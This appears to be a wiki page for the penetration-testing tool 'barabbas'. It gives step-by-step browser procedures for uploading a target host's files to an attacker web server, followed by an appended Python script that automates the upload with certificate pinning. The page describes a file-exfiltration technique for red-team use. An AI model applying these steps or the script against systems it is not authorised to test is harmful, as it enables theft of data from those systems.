UL_ _OSA_ _Web_Browsers - lighthouseitsecurity/barabbas GitHub Wiki

File Upload ➔ OS Agnostic ➔ Web Browsers

OVERVIEW:

NOTES:

  • documented this chapter for the sake of coverage and consistency
  • documented only the process for HTTPS
    • the process for HTTP is a subset of the process for HTTPS (step 3, accepting the certificate, does not apply)
    • over plain HTTP the uploaded file and the authentication exchange cross the network in cleartext; prefer HTTPS
    • also covering authentication (optional step)
  • step 3 (accepting the self-signed X.509 certificate) trusts whatever certificate the browser was presented with
    • before accepting, compare the certificate's fingerprint (View Certificate) with the fingerprint of the certificate the attacker web server was started with; a different fingerprint means the connection is not terminating at the intended server and the upload would land elsewhere
  • step 6 (MD5 comparison) detects a truncated or corrupted upload; it is an integrity check of the transfer, not a protection against tampering
  • for the sake of brevity, documenting each process for Windows OS only
    • process for Linux OS has minor (self-explanatory) differences (e.g. md5sum instead of certutil.exe in step 6)
  • using GUI clients preferred over using CLI clients for file transfer
    • faster
    • more reliable

Mozilla Firefox (HTTP; HTTPS)

https://www.mozilla.org/en-US/firefox/browsers/

TESTED ON: Windows 10 (22H2)

1. clear web browser's cache

(Ctrl+Shift+Del)

Time range to clear: ➔ (select) Everything

(mark all checkboxes)

Clear Now

2. navigate to attacker web server

https://192.168.5.11/

3. accept self-signed X.509 certificate

Advanced... ➔ Accept the Risk and Continue

4. [optional] provide credentials

Username ➔ (provide username from barabbas output)

Password ➔ (provide password from barabbas output)

Sign in

5. upload file

Browse... ➔ (select target file) ➔ Open

Upload

NOTE: also possible to drag and drop the target file to the Browse... button, instead

6. [optional] validate outcome (compare MD5 hashes)

certutil.exe -hashfile testfile_200MB md5

(confirm resulting value equal to value displayed in "File Upload Status" page)

Google Chrome (HTTP; HTTPS)

https://www.google.com/chrome/index.html

TESTED ON: Windows 10 (22H2)

1. clear web browser's cache

(Ctrl+Shift+Del)

[tab] Advanced

Time range ➔ (select) All time

(mark all checkboxes)

Clear data

2. navigate to attacker web server

https://192.168.5.11/

3. accept self-signed X.509 certificate

Advanced ➔ Proceed to (target) (unsafe)

4. [optional] provide credentials

Username ➔ (provide username from barabbas output)

Password ➔ (provide password from barabbas output)

Sign in

5. upload file

Choose File ➔ (select target file) ➔ Open

Upload

NOTE: also possible to drag and drop the target file to the Choose File button, instead

6. [optional] validate outcome (compare MD5 hashes)

certutil.exe -hashfile testfile_200MB md5

(confirm resulting value equal to value displayed in "File Upload Status" page)

Microsoft Edge (HTTP; HTTPS)

https://www.microsoft.com/en-us/edge

TESTED ON: Windows 10 (22H2)

1. clear web browser's cache

(Ctrl+Shift+Del)

Time range ➔ (select) All time

(mark all checkboxes)

Clear now

2. navigate to attacker web server

https://192.168.5.11/

3. accept self-signed X.509 certificate

Advanced ➔ Continue to (target) (unsafe)

4. [optional] provide credentials

Username ➔ (provide username from barabbas output)

Password ➔ (provide password from barabbas output)

Sign in

5. upload file

Choose File ➔ (select target file) ➔ Open

Upload

NOTE: also possible to drag and drop the target file to the Choose File button, instead

6. [optional] validate outcome (compare MD5 hashes)

certutil.exe -hashfile testfile_200MB md5

(confirm resulting value equal to value displayed in "File Upload Status" page)
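The three browser walkthroughs above (Firefox, Chrome, Edge) drive the same HTTP exchange by hand: a TLS handshake with a self-signed certificate (step 3), optional HTTP authentication (step 4), a multipart/form-data POST carrying the chosen file (step 5) and an MD5 comparison against the status page (step 6). The script below is an added example, not barabbas code and not part of the original wiki page; it reproduces that exchange with the Python standard library so the upload can be scripted or troubleshot, and replaces "Accept the Risk and Continue" with an explicit SHA-256 fingerprint check of the server certificate. The form field name "file", the upload path "/", HTTP Basic authentication for step 4 and the assumption that the status page contains the MD5 of the received file as a hex string are assumptions, not taken from the page or from barabbas.

```python
"""Added example (not barabbas code, not part of the original wiki page).

Reproduces the browser upload procedure (steps 3 to 6) over HTTPS with a
pinned self-signed certificate. Assumed, not taken from the page: form field
name "file", upload path "/", HTTP Basic authentication, MD5 hex on the
status page.
"""
import base64
import hashlib
import http.client
import re
import ssl
import uuid
from typing import Optional, Tuple


def md5_hex(data: bytes) -> str:
    """MD5 of the file bytes; same value certutil.exe -hashfile <file> md5 prints (step 6)."""
    return hashlib.md5(data).hexdigest()


def basic_auth_header(username: str, password: str) -> str:
    """Authorization header value for HTTP Basic authentication (assumed scheme for step 4)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"


def build_multipart(field: str, filename: str, data: bytes,
                    boundary: Optional[str] = None) -> Tuple[str, bytes]:
    """Build the multipart/form-data body an <input type="file"> submission produces
    (step 5). Returns (Content-Type header value, body bytes)."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


def status_page_confirms(page: str, local_md5: str) -> bool:
    """Step 6: True if the status page carries exactly the local MD5 (case-insensitive)."""
    found = {m.lower() for m in re.findall(r"\b[0-9a-fA-F]{32}\b", page)}
    return local_md5.lower() in found


def upload_file(host: str, port: int, path: str, field: str, filename: str,
                data: bytes, expected_sha256_fingerprint: Optional[str] = None,
                credentials: Optional[Tuple[str, str]] = None) -> Tuple[int, str]:
    """Perform the upload; returns (HTTP status, response body).

    The server certificate is self-signed, so CA validation is disabled, but the
    connection is aborted unless the certificate's SHA-256 fingerprint equals
    expected_sha256_fingerprint (take it from the certificate file the server was
    started with: openssl x509 -in cert.pem -noout -fingerprint -sha256).
    Passing None reproduces the browser's "Accept the Risk" behaviour (step 3).
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, context=ctx, timeout=15)
    conn.connect()
    der = conn.sock.getpeercert(binary_form=True)
    seen = hashlib.sha256(der).hexdigest()
    if expected_sha256_fingerprint is not None:
        want = expected_sha256_fingerprint.replace(":", "").lower()
        if seen != want:
            conn.close()
            raise ssl.SSLError(f"server certificate fingerprint {seen} != pinned {want}")
    content_type, body = build_multipart(field, filename, data)
    headers = {"Content-Type": content_type, "Content-Length": str(len(body))}
    if credentials is not None:
        headers["Authorization"] = basic_auth_header(*credentials)
    conn.request("POST", path, body=body, headers=headers)
    resp = conn.getresponse()
    page = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return resp.status, page


if __name__ == "__main__":
    # Constructed sample input; this part needs no network access.
    sample = b"A" * 1024
    local_md5 = md5_hex(sample)
    content_type, body = build_multipart("file", "testfile_1KB", sample)
    print(content_type)
    print(body[:120])
    print("local MD5:", local_md5)
    # Real run against the attacker web server (fill in fingerprint and credentials):
    # status, page = upload_file("192.168.5.11", 443, "/", "file", "testfile_200MB",
    #                            open("testfile_200MB", "rb").read(),
    #                            expected_sha256_fingerprint="<sha256 fingerprint>",
    #                            credentials=("<username>", "<password>"))
    # print(status, status_page_confirms(page, local_md5))
```

Running the script as-is only exercises the offline parts (body construction and MD5); the commented-out call shows the real run. Pinning by fingerprint rather than clicking through the warning matters most when the upload crosses a network the target organisation controls: a replaced certificate then fails loudly instead of delivering the file to an interposed host.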
